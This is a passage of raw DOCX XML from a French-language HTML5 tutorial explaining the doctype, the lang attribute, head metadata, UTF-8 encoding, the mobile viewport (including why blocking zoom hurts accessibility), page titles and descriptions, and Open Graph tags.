                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Quirks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4261"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Largeurs calculées différemment, styles imprévisibles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La déclaration HTML5 est volontairement courte et insensible à la casse. Gardez-la en minuscules, par cohérence avec le reste du document. N'essayez pas d'ajouter un numéro de version : HTML5 est un standard vivant, sans version figée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3.3 L'élément html et la langue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">L'élément </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est la racine du document. Son attribut </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>lang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> déclare la langue du contenu. Cette information, invisible, a des conséquences concrètes : prononciation par les lecteurs d'écran, césure, correction orthographique, traduction automatique, règles typographiques.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Déclarer une langue imprécise est toujours mieux que ne rien déclarer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&lt;html lang="fr"&gt;          &lt;!-- français --&gt;</w:t>
        <w:br/>
        <w:t>&lt;html lang="fr-BE"&gt;       &lt;!-- français de Belgique --&gt;</w:t>
        <w:br/>
        <w:t>&lt;html lang="en"&gt;          &lt;!-- anglais --&gt;</w:t>
        <w:br/>
        <w:t>&lt;html lang="pt-BR"&gt;       &lt;!-- portugais du Brésil --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un document bilingue déclare la langue de chaque passage avec l'attribut </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>lang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur l'élément concerné : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;span lang="en"&gt;responsive design&lt;/span&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Les lecteurs d'écran changeront alors de prononciation au milieu du texte.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3.4 L'en-tête : ce que l'utilisateur ne voit pas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">L'élément </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>head</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> contient les métadonnées. Aucune de ses lignes ne s'affiche directement, mais chacune influence le rendu, le référencement ou le comportement du navigateur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.7 — Les métadonnées d'un en-tête de qualité</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209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Élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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128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Obligatoire ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="257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Recommandation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2093"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>meta charset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3058"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Encodage des caractères</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1288"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>De fait</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2575"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>utf-8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>, en premier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2093"/>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meta viewport</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Adaptation aux écrans mobiles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="128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De fait</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="257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width=device-width, initial-scale=1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2093"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3058"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Titre de l'onglet et du résultat de recherche</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1288"/>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Unique, 50 à 60 caractères</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2093"/>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meta description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Résumé affiché par les moteurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="128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120 à 155 caractères</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2093"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>link rel=stylesheet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3058"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Feuille de style</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1288"/>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Une feuille principale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2093"/>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link rel=icon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Favicon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="128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SVG + repli PNG</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2093"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>meta og:*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3058"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Aperçu sur les réseaux sociaux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1288"/>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Titre, description, image</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2093"/>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script</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Comportement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="128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257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defer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> ou </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>type=module</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>3.4.1 L'encodage des caractères</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;meta charset="utf-8"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> doit apparaître dans les 1024 premiers octets du fichier. Le serveur peut aussi déclarer l'encodage dans l'en-tête HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ; en cas de contradiction, c'est généralement l'en-tête HTTP qui gagne, d'où l'importance de configurer les deux.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Pourquoi UTF-8 ? Parce qu'il représente tous les caractères de tous les systèmes d'écriture, y compris les emojis, avec un octet par caractère ASCII. Un fichier enregistré en ISO-8859-1 affichera « Ã© » à la place de « é » : les octets sont corrects, l'interprétation ne l'est pas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>3.4.2 L'adaptation mobile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sans la balise </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>viewport</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, un téléphone suppose une largeur de page de 980 pixels et dézoome pour tout faire tenir : le texte devient minuscule. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>width=device-width</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> aligne la largeur du viewport sur celle de l'écran.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une déclaration correcte, et trois erreurs fréquentes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&lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;</w:t>
        <w:br/>
        <w:t>&lt;!-- Ne pas écrire : --&gt;</w:t>
        <w:br/>
        <w:t>&lt;meta name="viewport" content="width=1024, maximum-scale=1, user-scalable=no"&gt;</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BLOQUER LE ZOOM EST UNE FAUTE D'ACCESSIBILITÉ</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>user-scalable=no</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>maximum-scale=1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> empêchent les personnes malvoyantes d'agrandir le texte. Cette pratique, encore répandue, est contraire aux règles d'accessibilité et pénalisée par les moteurs de recherche.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>3.4.3 Titre et description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est le texte affiché dans l'onglet, dans les favoris et comme lien dans les résultats de recherche. Il doit être unique par page, descriptif et placé avant tout contenu. La </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>meta description</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> n'influence pas directement le classement, mais elle détermine le texte de l'extrait : elle mérite une rédaction soignée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Le titre décrit le contenu, la marque est placée en fin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&lt;title&gt;Guide HTML5 : structure d'un document — Espritropic&lt;/title&gt;</w:t>
        <w:br/>
        <w:t>&lt;meta name="description"</w:t>
        <w:br/>
        <w:t>content="Comprendre le doctype, l'encodage, le viewport et les métadonnées</w:t>
        <w:br/>
        <w:t xml:space="preserve">              essentielles d'un document HTML5 valide."&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>3.4.4 L'aperçu social</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les réseaux sociaux lisent des balises Open Graph pour construire l'aperçu d'un lien. Sans elles, ils devinent, souvent mal. Quatre propriétés suffisent :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un aperçu social correct se prépare, il ne se devine pas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&lt;meta property="og:type" content="article"&gt;</w:t>
        <w:br/>
        <w:t>&lt;meta property="og:title" content="La structure d'un document HTML5"&gt;</w:t>
        <w:br/>
        <w:t>&lt;meta property="og:description" content="Doctype, encodage, viewport : ce que</w:t>
        <w:br/>
        <w:t xml:space="preserve">  le</w:t>
        <w:br/>
        <w:t xml:space="preserve">      navigateur lit avant d'afficher."&gt;</w:t>
        <w:br/>
        <w:t>&lt;meta property="og:image" content="https://exemple.fr/img/apercu-html5.png"&gt;</w:t>
        <w:br/>
        <w:t>&lt;meta property="og:url" content="https://exemple.fr/html5/structure"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
